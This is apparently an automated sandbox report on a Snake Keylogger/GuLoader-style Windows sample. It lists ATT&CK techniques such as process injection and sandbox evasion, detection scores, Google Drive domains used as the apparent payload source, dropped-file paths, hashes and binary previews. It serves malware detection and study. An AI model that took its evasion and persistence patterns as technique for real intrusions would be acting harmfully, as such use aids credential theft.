Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_00405DC3 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405DC3

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yMXFgPOdf2.exe	74%	ReversingLabs	Win32.Spyware.Snakekeylogger
yMXFgPOdf2.exe	67%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe	74%	ReversingLabs	Win32.Spyware.Snakekeylogger

Source	Detection	Scanner	Label	Link
https://www.google.com7	0%	Avira URL Cloud	safe
https://www.google.com77	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
drive.google.com	142.250.184.238	true	false	high
drive.usercontent.google.com	142.250.185.161	true	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/dN	msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2444573507.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2317159024.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2329776779.00000000088CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com7	msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB_q	powershell.exe, 00000002.00000002.1828484729.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000007.00000003.2020881269.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1998363215.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2111815111.000000000891F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.00000000088C5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000007.00000003.2168449456.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2247799881.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1985745862.00000000088CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2547048092.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2237096223.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2341152957.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1973777861.00000000088CF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2214193524.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2260331714.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2133964562.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2044287988.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2352723110.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2066608581.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293897107.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2146169689.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2100971085.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2422378070.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2455642871.0000000008908000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2467698218.0000000008908000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	yMXFgPOdf2.exe, 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmp, yMXFgPOdf2.exe, 00000000.00000000.1352234700.000000000040A000.00000008.00000001.01000000.00000003.sdmp	false		high
https://drive.google.com/aS%	msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mi	powershell.exe, 00000002.00000002.1833058166.000000000772D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com77	msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	msiexec.exe, 00000007.00000003.2168449456.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2247799881.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2547048092.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2237096223.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2341152957.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2214193524.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2191707284.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2260331714.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2133964562.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2478507139.00000000088CB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2044287988.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2352723110.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2066608581.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2293897107.00000000088CC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2146169689.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2100971085.00000000088C9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2422378070.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2400033827.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2433075862.00000000088C8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2444573507.00000000088CB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.1828484729.0000000005246000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1831196151.0000000006158000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/TN	msiexec.exe, 00000007.00000003.2044287988.00000000088C7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2009877653.00000000088C6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2020881269.00000000088C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/;	msiexec.exe, 00000007.00000003.2317159024.00000000088C9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000007.00000003.2157134441.00000000088C9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.microsoft.c	powershell.exe, 00000002.00000002.1836180120.0000000008899000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1828484729.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/qS5	msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.185.161	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
142.250.184.238	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588705
Start date and time:	2025-01-11 04:24:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yMXFgPOdf2.exe renamed because original name is a hash value
Original Sample Name:	c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7.exe
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@6/12@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 93% Number of executed functions: 87 Number of non-executed functions: 52
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6332 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:26:00	API Interceptor	39x Sleep call for process: powershell.exe modified
22:27:01	API Interceptor	28x Sleep call for process: msiexec.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	1dVtYIvfHz.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	FJRUb5lb9m.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	5hD3Yjf7xD.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	02Eh1ah35H.exe	Get hash	malicious	GuLoader	Browse	13.107.246.45
	AJ5zYYsisA.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	1297823757234143258.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	4N4nldx1wW.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	1487427797195518826.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	5by4QM3v89.exe	Get hash	malicious	FormBook	Browse	13.107.246.45

ASNs

⊘No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.161 142.250.184.238
	LMSxhK1u8Z.exe	Get hash	malicious	GuLoader	Browse	142.250.185.161 142.250.184.238
	ro7eoySJ9q.exe	Get hash	malicious	GuLoader	Browse	142.250.185.161 142.250.184.238
	ro7eoySJ9q.exe	Get hash	malicious	GuLoader	Browse	142.250.185.161 142.250.184.238
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.161 142.250.184.238
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.185.161 142.250.184.238
	YrCSUX2O3I.exe	Get hash	malicious	GuLoader	Browse	142.250.185.161 142.250.184.238
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.185.161 142.250.184.238
	4AMVusDMPP.exe	Get hash	malicious	GuLoader	Browse	142.250.185.161 142.250.184.238
	Cpfkf79Rzk.exe	Get hash	malicious	GuLoader	Browse	142.250.185.161 142.250.184.238

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fks2ylw.pij.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjwrl3s2.53t.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_inapynsn.pfj.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhrcy5bi.nkv.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Bankrveri.Und

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	data
Category:	dropped
Size (bytes):	348907
Entropy (8bit):	7.64923648165635
Encrypted:	false
SSDEEP:	6144:JhtZdbciFRH/0Mx7fRlSiK32RoFqpOXNBhknlKcwoMFW0wN:NjxF5xrRlFK32R0zm5woMFWH
MD5:	000C4C2148C711E5D3CBEED4144C6F55
SHA1:	E35927390A543BEE257AE0009701C57FF6704E55
SHA-256:	8E75A4461FDBC1386345F6F9CCD0984FBB1799B92033F902B2F43EB6421B9E7E
SHA-512:	613BB7929D5BEDF7A12C41553AD87B955C5EC6862E15DB03E776DC55B396A7D25CDA6E5F40319DE8896D108D1521AD4CC1D070ADEA91F2E4DFFE79ECBB5E654B
Malicious:	false
Preview:	...................\|.....555..##.c.-.........e.............]].:::::::...mmm..................................^^.................HHHH.......FFFF.III....ff.........................TT....UU..nn..ssssss.............00000..a........I...--..'.??....~........m...RRR.!!..44.......*.00................((.6.............j..............-..............##.4.9.MM..........}}}.........=.............D............................::..mmmm.....jj.......a.............mm.........y.....................................................z......ee.9999999999.......................???...........I......./....................RRRR..z.....................................".((.........................@..................s..qqqqqq.;..@..............oooooo.tt....S.GGGG..a......c...............NN..l...........w.MM...YY.....................D..fffffff.\.....................88.....aa...PPP.......q.....Y.g...........................2.....>>........ee............[[[. .1...```...............T.................+++..GG............c.

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Stumblebum.uns

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	data
Category:	dropped
Size (bytes):	389321
Entropy (8bit):	1.2441456788113954
Encrypted:	false
SSDEEP:	1536:FeL5BK5C2PeeejgqyaJ5vizEyLZ/5DKMdt/v:ALXYcjBjJRioyLZ/vP
MD5:	89E3C9CE687BCCD3DD422E9CF78E80E7
SHA1:	007C57BDF5F5E6C0E5B711EBC7BABD673405868D
SHA-256:	51F91F8B04620D371417A6A74162ABD8B690909C544F320338B874F3DDAC4BC2
SHA-512:	2245F6FF3D25FF4142C8C2FB716C775F16592E33909EF9CBD61D2B4AB9891224D45AA58DE3861606DE97604BDD91C78F05BFEFA9A5E80F3272AEBEA6023B804D
Malicious:	false
Preview:	....O................................................<...7.K.......................\...........................................$............M......................................................................................................~...................q................................................................................w..............r...........................a...........................%......................l.......................................4.........+.............................................._.............................................................@..................................................................................#.....................Q....................M....................X....e..................lC.........,..............................a........C....1..............................[...................q...............................B.............................,.........U...................................................

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\leverancernes.hor

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	data
Category:	dropped
Size (bytes):	353789
Entropy (8bit):	1.2644758643056393
Encrypted:	false
SSDEEP:	768:13gkCATl4BkZKo0fUjjxFBEdCYm58mNplGQUxbgNcDr7A78Q0Ej8RTTzVs2zWjtq:d0AHnNm/pdYlHvnAYv
MD5:	1389593C3437BAED25D4CD0C926898FF
SHA1:	532BC681AF49B0BEAD471EBBA0AB0191E78A4E02
SHA-256:	9A8D9ED596327751DB6960002DD258066E82BE64080C737D381708446BEB519E
SHA-512:	C6DB96BAEA286B7281B1E068B78D5076F4EAE2DBEB01CAA43C59C29F1839F2328FB59ACE190EA8267790D726706E0F0234876F6ED665818EA0D1AE252DB18C57
Malicious:	false
Preview:	...............6........................R.N.......................................................^.......................................w.......................R..................................k.......................~.................U...................... s..................4........V............................<............h...........U...............................-...................................................e.................@.......-................................................[...............=...........................................N.....w..^.5.............+.............................................................................*...........................c...........................b.......................f............>....................+...................0_........................................@........^........._.........W........u............................................b...$...........}.........................9.~...........L.................

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	554816
Entropy (8bit):	7.967733280499974
Encrypted:	false
SSDEEP:	12288:aICfPgs7diA6gdZiygrNIVYAHHjMIyoS/B3FYA1YU:MZdL6AMxI+Aopz/lJv
MD5:	54327A2F6C75BB2C549A5A98A462A588
SHA1:	F65473FA075BEF32B55445D84CB8BFA4DA48AC79
SHA-256:	C3463021D3069AE7AAD460707A950EB7B427A65C87F3D8E201B59CEBB886A1B7
SHA-512:	88595FA0AF8AC0211145787CE0D0D3AFDFB396EDFCFCBAB16D4714FBFB1077A8EB8DF5EC6BD9AAEFD916611363DD7791C62CFABA24A571BD4279FFB93BB73866
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.*j........PE..L....f.R.................b..........)2............@..................................................................................... ............................................................................................................text...l`.......b.................. ..`.rdata..`............f..............@..@.data................\|..............@....ndata.......P...........................rsrc... ...........................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe:Zone.Identifier

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4175), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	72419
Entropy (8bit):	5.202406314479258
Encrypted:	false
SSDEEP:	1536:5IvdS5j9pnCoq0dne+ScDJCnHEQNH48jf3Wv+DTUPStt+LLAfD:GvwDpnf1J4nHtYuf86PN7
MD5:	5F7683B5FC367FB972FDAF8E80B65209
SHA1:	A13FF69F57AF2E5AB471F513C8188437D6D2EE6C
SHA-256:	4DD50C49D0122FC5E02AC8806E6F6ABACFA8A5F9E868355824665DD76FAD2959
